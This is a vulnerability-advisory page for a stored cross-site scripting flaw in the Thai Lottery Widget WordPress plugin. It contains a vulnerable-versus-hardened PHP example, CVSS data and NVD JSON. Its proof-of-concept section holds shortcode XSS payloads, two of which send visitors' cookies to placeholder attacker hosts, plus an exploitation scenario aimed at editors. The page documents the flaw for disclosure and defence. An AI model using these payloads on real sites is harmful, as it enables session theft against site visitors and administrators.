Security Vulnerability Report
CVE-2025-13678 CVSS 6.4 MEDIUM

CVE-2025-13678

Published: 2025-12-05 10:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Thai Lottery Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `thailottery` shortcode in all versions up to, and including, 2.5. This is due to insufficient input sanitization and output escaping on the user supplied `width` and `height` shortcode attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Contributors lack the `unfiltered_html` capability, so their post content passes through KSES on save, but a shortcode is stored as plain text rather than HTML; the offending markup is generated by the plugin's handler at render time, after KSES has run, which is why the capability check does not help here.
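The pattern the description names, an attribute value copied straight into markup, beside the form that fixes it, as an added example. This is not the plugin's code and nothing here comes from `thailottery.php`; it assumes WordPress is loaded (`shortcode_atts()`, `absint()`, `esc_attr()`, `esc_url()` and `add_shortcode()` are core functions), and the `<iframe>` element, the defaults and the widget URL are placeholders, since the advisory does not say what the real shortcode renders.

```php
<?php
/**
 * Added example, not the Thai Lottery Widget plugin's code.
 * Assumes WordPress is loaded. The <iframe>, the defaults and the
 * widget URL (example.invalid) are assumptions for illustration only.
 */

// Vulnerable shape described by the advisory: the shortcode attribute
// values are concatenated into HTML attributes without escaping.
// With [thailottery width='100" onmouseover="alert(1)" x="' height='200']
// the output becomes width="100" onmouseover="alert(1)" x="" height="200",
// so the injected event handler is live. Kept for comparison only;
// do not register this handler.
function example_thailottery_vulnerable( $atts ) {
    $atts = shortcode_atts(
        array( 'width' => '300', 'height' => '250' ),
        $atts,
        'thailottery_safe_example'
    );
    return '<iframe src="https://example.invalid/widget" width="'
        . $atts['width'] . '" height="' . $atts['height'] . '"></iframe>';
}

// Hardened form. Sizes can only ever be integers, so coerce with absint()
// (abs(intval())): the payload '100" onmouseover=...' collapses to 100 and
// 'javascript:alert(1)' collapses to 0. Bound the result so a zero or a
// huge value cannot break the layout, and still escape at output so a
// later change of attribute type cannot reintroduce the bug.
function example_thailottery_safe( $atts ) {
    $atts = shortcode_atts(
        array( 'width' => 300, 'height' => 250 ),
        $atts,
        'thailottery_safe_example'
    );
    $width  = absint( $atts['width'] );
    $height = absint( $atts['height'] );
    if ( $width < 50 || $width > 2000 ) {
        $width = 300;
    }
    if ( $height < 50 || $height > 2000 ) {
        $height = 250;
    }
    return sprintf(
        '<iframe src="%s" width="%s" height="%s"></iframe>',
        esc_url( 'https://example.invalid/widget' ),
        esc_attr( (string) $width ),
        esc_attr( (string) $height )
    );
}

add_shortcode( 'thailottery_safe_example', 'example_thailottery_safe' );
```

The integer coercion is what actually closes the hole; `esc_attr()` on an already-numeric string is a no-op today but keeps the output safe if someone later allows values such as `100%`. A free-form string attribute would instead need `esc_attr()` on the way out and, for anything that lands in a URL, `esc_url()`.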

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is published for this CVE (the NVD record below carries no `configurations` node). Affected product, taken from the description:

Thai Lottery Widget plugin for WordPress <= 2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
text
// CVE-2025-13678 PoC - Thai Lottery Widget Stored XSS
// Author: Security Researcher
// Target: WordPress with Thai Lottery Widget plugin <= 2.5
//
// Each payload is a shortcode placed in post content. WordPress's shortcode
// parser accepts a single-quoted attribute value containing double quotes,
// so the value closes the HTML attribute the plugin emits and appends an
// event-handler attribute; the trailing x=" absorbs the plugin's own closing
// quote. A literal single quote inside the value ends the shortcode
// attribute early, so the JavaScript must avoid single quotes.

// PoC 1: Basic XSS via width parameter
[thailottery width='100" onmouseover="alert(document.cookie)" x="' height='200']

// PoC 2: XSS via height parameter (a template literal avoids single quotes;
// onerror only fires on an element that loads a resource, which depends on
// what the plugin renders)
[thailottery width='300' height='200" onerror="fetch(`https://attacker.com/steal?cookie=${document.cookie}`)" x="']

// PoC 3: CSS expression() - IE-only and removed long ago; width is an HTML
// attribute here, not a style, so this does not execute in any current browser
[thailottery width='500px;expression(alert("XSS"))' height='300']

// PoC 4: javascript: URI - inert unless the plugin uses width as a URL,
// which the advisory does not describe
[thailottery width='javascript:alert(document.domain)' height='100']

// PoC 5: onload as its own shortcode attribute - only works if the plugin
// copies arbitrary attributes through; the advisory names only width and height
[thailottery width='100' height='200' onload='fetch("https://evil.com/log?c="+btoa(document.cookie))']

// Exploitation scenario:
// 1. Attacker with Contributor role creates or edits a post
// 2. Inserts a shortcode such as PoC 1 into the post content; KSES does not
//    strip it because the stored text is a shortcode, not HTML, and the
//    markup is generated by the plugin at render time
// 3. Submits the post for review (Contributors cannot publish)
// 4. The script runs in the browser of an Editor or Administrator who
//    previews the pending post, and for every visitor once it is published

References

https://plugins.trac.wordpress.org/browser/thai-lottery-widget/tags/2.5/thailottery.php#L330
https://plugins.trac.wordpress.org/browser/thai-lottery-widget/trunk/thailottery.php#L330
https://www.wordfence.com/threat-intel/vulnerabilities/id/949eb9d6-0c8f-43f1-8580-998ea78c9549?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13678", "sourceIdentifier": "[email protected]", "published": "2025-12-05T10:15:47.047", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Thai Lottery Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `thailottery` shortcode in all versions up to, and including, 2.5. This is due to insufficient input sanitization and output escaping on the user supplied `width` and `height` shortcode attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/thai-lottery-widget/tags/2.5/thailottery.php#L330", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/thai-lottery-widget/trunk/thailottery.php#L330", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/949eb9d6-0c8f-43f1-8580-998ea78c9549?source=cve", "source": "[email protected]"}]}}